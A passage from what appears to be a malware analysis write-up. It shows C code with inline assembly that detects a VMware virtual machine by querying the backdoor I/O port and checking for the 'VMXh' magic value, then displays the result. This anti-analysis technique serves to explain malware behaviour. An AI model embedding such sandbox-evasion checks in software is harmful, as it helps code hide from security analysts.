            mov ecx, 0xA        // command 0x0A: get version
            mov edx, 'VX'       // port number
            in eax, dx          // read the VM version from the port into eax
            cmp ebx, 'VMXh'     // ebx is set to the magic only under VMware
            setz [bRet]
            pop ebx
            pop eax
            pop edx
        }
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        // on real hardware the privileged IN instruction faults and lands here
        bRet = FALSE;
    }
    return bRet;
}

int main(int argc, char *argv[])
{
    if (IsbVm())
    {
        MessageBox(NULL, _T("Find VM"), _T("OK"), MB_OK);
    }
    else
        MessageBox(NULL, _T("Not VM"), _T("Error"), MB_OK);
    return 0;
}
Next comes the analysis of the real culprit, alg.exe.